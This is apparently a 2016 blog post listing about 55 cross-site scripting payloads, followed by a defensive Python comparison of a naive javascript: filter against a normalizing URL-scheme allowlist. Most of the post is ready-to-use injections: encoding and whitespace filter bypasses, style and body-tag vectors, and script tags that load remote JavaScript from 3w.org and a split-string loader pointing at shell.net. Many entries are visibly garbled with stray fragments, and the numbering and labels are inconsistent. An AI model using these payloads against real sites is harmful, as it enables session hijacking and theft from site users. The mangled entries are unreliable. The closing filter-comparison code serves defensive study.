XSS Attack Roundup

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert boxes
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Getting around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; the null character is basically ineffective domestically, since there is nowhere it can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
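Most of the URL-attribute variants above (items 3-5, 8-14, 17 and 19) exist to slip past filters that look for the literal string javascript:, because the browser decodes entities and drops tabs, newlines and surrounding whitespace before it parses the scheme. The following is an added defensive example, not part of the original post: a naive prefix check beside one that normalizes the attribute value roughly the way a browser does and then allowlists the scheme. The sample values are constructed here in the styles of the items above.

```python
import html
import re

# Only these schemes are allowed in href/src-style attributes; everything
# else (javascript:, vbscript:, data:, ...) is rejected by the allowlist.
ALLOWED_SCHEMES = {"http", "https"}

# Leading/trailing C0 controls and space that a URL parser trims.
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def naive_is_safe(value):
    """Typical weak check: only a literal, lowercase 'javascript:' prefix is rejected."""
    return not value.startswith("javascript:")


def normalize_url(value):
    """Reduce an attribute value to roughly what the browser's URL parser sees."""
    # 1. Attribute values are entity-decoded first; html.unescape also accepts
    #    numeric references without a trailing semicolon (items 5 and 8-10).
    decoded = html.unescape(value)
    # 2. Tab, newline and carriage return are dropped anywhere in a URL
    #    (items 11-14); NUL is removed too, as a conservative choice (item 17).
    decoded = re.sub(r"[\t\n\r\x00]", "", decoded)
    # 3. Leading/trailing controls and spaces are trimmed (item 19).
    return decoded.strip(_C0_AND_SPACE)


def scheme_of(url):
    """Lowercase scheme of the URL, or None when it is relative (no scheme)."""
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", url)
    return m.group(1).lower() if m else None


def is_safe_url(value):
    """Allowlist check on the normalized value: relative URLs and http(s) only."""
    scheme = scheme_of(normalize_url(value))
    return scheme is None or scheme in ALLOWED_SCHEMES


# Constructed samples; item numbers refer to the post above.
SAMPLES = {
    "plain": "javascript:alert('XSS')",                                   # item 3
    "mixed_case": "JaVaScRiPt:alert('XSS')",                              # item 4
    "entities": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('XSS')",  # item 5
    "no_semicolon": "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099"
                    "&#0000114&#0000105&#0000112&#0000116:alert('XSS')",  # item 9
    "tab": "jav&#x09;ascript:alert('XSS')",                               # item 12
    "newline": "jav\nascript:alert('XSS')",                               # item 13
    "leading_ws": " \t javascript:alert('XSS')",                          # item 19
    "https": "https://example.com/page",
    "relative": "/images/logo.png",
}


def compare_checks(samples=SAMPLES):
    """Map each sample to (naive verdict, normalized verdict); True means allowed."""
    return {name: (naive_is_safe(v), is_safe_url(v)) for name, v in samples.items()}
```

Running compare_checks() shows the naive check letting every variant except the plain one through, while the normalized allowlist rejects all of them and still accepts the https and relative URLs.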